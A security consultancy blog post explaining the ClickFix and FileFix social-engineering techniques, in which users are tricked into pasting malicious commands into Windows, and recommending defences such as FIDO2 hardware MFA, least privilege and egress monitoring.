Why Your Employees are Pasting the Keys to the Kingdom

As security consultants, we've spent years telling clients to "think before you click". But in the last 12 months, the threat landscape has shifted so fundamentally that this advice is becoming dangerously obsolete. We are no longer just fighting malicious links; we are fighting a new breed of social engineering that turns your users’ own administrative habits against them.

The trend is called ClickFix, and its newer sibling, FileFix. These aren't just clever tricks, they are AI accelerated campaigns that bypass your technical controls by manipulating the person at the keyboard into executing the attack themselves.

The Mechanics of the Shell Based Attack

Traditional phishing relies on a user downloading a file or visiting a credential harvesting site. ClickFix is different. It relies on User Execution (MITRE ATT&CK T1204) by instructing the victim to paste a malicious PowerShell command directly into the operating system.

The workflow typically looks like this:

• The Lure: A user visits a compromised site or receives a highly convincing AI generated email (often appearing as a "Fix" for a browser error or a document loading issue).
• The Instruction: The site presents a popup with a "Fix" button. Clicking it doesn't download a virus; instead, it copies a malicious script to the user's clipboard.
• The Shell Paste: The user is then instructed to press a keyboard shortcut and paste the code.
  
  • ClickFix: Directs users to the Run Dialog (Win + R).
  • FileFix: Directs users to the File Explorer address bar (CTRL + L or ALT + D).

By the time the user hits "Enter", they have manually bypassed your EDR’s browser protections and executed an infostealer or a Remote Access Trojan (RAT) directly into the OS shell.

Why Traditional Training is Failing

We have to be honest: standard security awareness training is no longer a match for AI driven deception.

Recent data shows that phishing attempts crafted by Large Language Models (LLMs) achieve a 54% clickthrough rate, compared to just 12% for human generated attempts. That is a 4.5x increase in effectiveness. Adversaries are using AI to remove the tell-tale signs we’ve taught employees to look for such as the poor grammar, the clunky formatting, and the suspicious URLs are gone.

When a ClickFix prompt looks identical to a legitimate Windows system message, and the "fix" involves a common IT troubleshooting step (like using the Run command), even your most tech savvy employees can be deceived.

Moving to Phishing Resistant MFA

At Cyber Context, our commitment to Integrity and Excellence means we don't just point out the problem; we provide the definitive shield.

If we cannot "patch" every human, we must make the consequences of their mistakes negligible. This is why we advocate for phishing resistant MultiFactor Authentication (MFA) - specifically FIDO2 based hardware keys - as a non-negotiable layer of defence.

Unlike traditional MFA (SMS codes or push notifications), which can be intercepted or "fatigued," phishing resistant MFA creates a cryptographic link between the user’s device and the specific service they are accessing. Even if an employee is tricked into pasting a script or entering a password, the attacker cannot complete the authentication without the physical hardware key.

Studies show that implementing phishing resistant MFA can block over 99% of identity based attacks.

The Consultant’s Verdict

The rise of ClickFix and FileFix proves that adversaries have mastered the "human shell." They are evolving rapidly, so much so that legacy training simply cannot follow.  It is vital that you can also move at Pace to ensure your controls are in place to detect and prevent such attacks.

To show true Care for your employees and your digital estate, you must move beyond the "checklist" of awareness training. We recommend that to truly encapsulate a defence-in-depth strategy, you must fortify the environment around your users’ identities. This begins with implementing a strong Role-Based Access Control (RBAC) model and the principle of least privilege across your entire technology estate. By limiting the inherent permissions of compromised accounts, you dramatically reduce an attacker's ability to move laterally and cause damage (the blast radius).

Secondly, you need to provide your users with the tools like hardware backed MFA that protect them even when a highly sophisticated AI manages to win their trust.

Third, establishing observability and control over egress traffic is essential. Leverage modern SASE (Secure Access Service Edge) solutions with AI-driven detection and categorisation to proactively prevent users from accessing suspicious websites known to, or likely to, initiate ClickFix or FileFix attacks, and crucially block any subsequent traffic to a command-and-control (C2) server.

Finally, maintain continuous monitoring of all activity on your endpoints and egress points. Promptly detecting suspicious behaviour such as unusual process execution or anomalous network connections is your final opportunity to intercept the attack chain and secure your digital crown jewels.

Is your organisation still relying on "don't click" as its primary defence? Let’s talk about modernising your network and identity strategy for the AI era.

‍